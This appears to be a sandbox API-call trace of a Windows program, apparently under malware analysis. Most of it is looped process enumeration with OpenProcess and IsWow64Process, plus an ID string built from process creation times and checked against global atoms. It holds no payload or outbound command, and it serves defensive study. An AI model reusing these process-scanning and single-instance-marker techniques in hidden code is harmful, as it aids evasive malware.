	[0089.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.578] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.578] CloseHandle (hObject=0x20c) returned 1
	[0089.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.578] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.578] CloseHandle (hObject=0x20c) returned 1
	[0089.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.579] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.579] CloseHandle (hObject=0x20c) returned 1
	[0089.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.579] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.579] CloseHandle (hObject=0x20c) returned 1
	[0089.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.579] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.579] CloseHandle (hObject=0x20c) returned 1
	[0089.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.579] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.579] CloseHandle (hObject=0x20c) returned 1
	[0089.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.579] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.579] CloseHandle (hObject=0x20c) returned 1
	[0089.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.579] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.580] CloseHandle (hObject=0x20c) returned 1
	[0089.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.580] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.580] CloseHandle (hObject=0x20c) returned 1
	[0089.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.580] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.580] CloseHandle (hObject=0x20c) returned 1
	[0089.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.580] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.580] CloseHandle (hObject=0x20c) returned 1
	[0089.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.580] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.580] CloseHandle (hObject=0x20c) returned 1
	[0089.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.580] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.580] CloseHandle (hObject=0x20c) returned 1
	[0089.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.581] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.581] CloseHandle (hObject=0x20c) returned 1
	[0089.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.581] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.581] CloseHandle (hObject=0x20c) returned 1
	[0089.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.581] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.581] CloseHandle (hObject=0x20c) returned 1
	[0089.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.581] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.581] CloseHandle (hObject=0x20c) returned 1
	[0089.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.581] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.581] CloseHandle (hObject=0x20c) returned 1
	[0089.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.581] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.581] CloseHandle (hObject=0x20c) returned 1
	[0089.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.582] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.582] CloseHandle (hObject=0x20c) returned 1
	[0089.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.582] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.582] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.582] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.583] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.583] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.583] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.583] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.583] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.583] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.584] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.584] CloseHandle (hObject=0x20c) returned 1
	[0089.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.584] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.584] CloseHandle (hObject=0x20c) returned 1
	[0089.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.664] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.664] CloseHandle (hObject=0x20c) returned 1
	[0089.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.665] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.665] CloseHandle (hObject=0x20c) returned 1
	[0089.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.665] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.665] CloseHandle (hObject=0x20c) returned 1
	[0089.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.665] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.665] CloseHandle (hObject=0x20c) returned 1
	[0089.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.666] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.666] CloseHandle (hObject=0x20c) returned 1
	[0089.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.666] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.666] CloseHandle (hObject=0x20c) returned 1
	[0089.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.666] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.666] CloseHandle (hObject=0x20c) returned 1
	[0089.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.666] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.666] CloseHandle (hObject=0x20c) returned 1
	[0089.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.666] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.666] CloseHandle (hObject=0x20c) returned 1
	[0089.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.667] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.667] CloseHandle (hObject=0x20c) returned 1
	[0089.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.667] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.667] CloseHandle (hObject=0x20c) returned 1
	[0089.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.667] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.667] CloseHandle (hObject=0x20c) returned 1
	[0089.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.667] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.667] CloseHandle (hObject=0x20c) returned 1
	[0089.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.667] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.667] CloseHandle (hObject=0x20c) returned 1
	[0089.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.667] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.667] CloseHandle (hObject=0x20c) returned 1
	[0089.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.668] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.668] CloseHandle (hObject=0x20c) returned 1
	[0089.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.668] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.668] CloseHandle (hObject=0x20c) returned 1
	[0089.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.668] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.668] CloseHandle (hObject=0x20c) returned 1
	[0089.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.668] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.668] CloseHandle (hObject=0x20c) returned 1
	[0089.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.668] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.668] CloseHandle (hObject=0x20c) returned 1
	[0089.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.668] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.669] CloseHandle (hObject=0x20c) returned 1
	[0089.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.669] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.669] CloseHandle (hObject=0x20c) returned 1
	[0089.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.669] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.669] CloseHandle (hObject=0x20c) returned 1
	[0089.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.669] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.669] CloseHandle (hObject=0x20c) returned 1
	[0089.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.669] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.669] CloseHandle (hObject=0x20c) returned 1
	[0089.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.669] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.669] CloseHandle (hObject=0x20c) returned 1
	[0089.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.670] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.670] CloseHandle (hObject=0x20c) returned 1
	[0089.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.670] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.670] CloseHandle (hObject=0x20c) returned 1
	[0089.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.670] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.670] CloseHandle (hObject=0x20c) returned 1
	[0089.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.670] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.670] CloseHandle (hObject=0x20c) returned 1
	[0089.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.670] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.670] CloseHandle (hObject=0x20c) returned 1
	[0089.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.671] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.671] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.671] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.671] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.671] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.671] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.672] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.672] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.672] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.672] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.672] CloseHandle (hObject=0x20c) returned 1
	[0089.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.672] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.672] CloseHandle (hObject=0x20c) returned 1
	[0089.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.748] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.748] CloseHandle (hObject=0x20c) returned 1
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.748] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.749] CloseHandle (hObject=0x20c) returned 1
	[0089.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.749] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.749] CloseHandle (hObject=0x20c) returned 1
	[0089.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.749] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.749] CloseHandle (hObject=0x20c) returned 1
	[0089.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.749] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.749] CloseHandle (hObject=0x20c) returned 1
	[0089.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.749] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.749] CloseHandle (hObject=0x20c) returned 1
	[0089.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.749] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.749] CloseHandle (hObject=0x20c) returned 1
	[0089.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.750] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.750] CloseHandle (hObject=0x20c) returned 1
	[0089.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.750] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.750] CloseHandle (hObject=0x20c) returned 1
	[0089.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.750] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.750] CloseHandle (hObject=0x20c) returned 1
	[0089.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.750] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.750] CloseHandle (hObject=0x20c) returned 1
	[0089.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.750] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.750] CloseHandle (hObject=0x20c) returned 1
	[0089.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.751] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.751] CloseHandle (hObject=0x20c) returned 1
	[0089.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.751] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.751] CloseHandle (hObject=0x20c) returned 1
	[0089.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.751] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.751] CloseHandle (hObject=0x20c) returned 1
	[0089.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.751] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.751] CloseHandle (hObject=0x20c) returned 1
	[0089.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.751] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.751] CloseHandle (hObject=0x20c) returned 1
	[0089.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
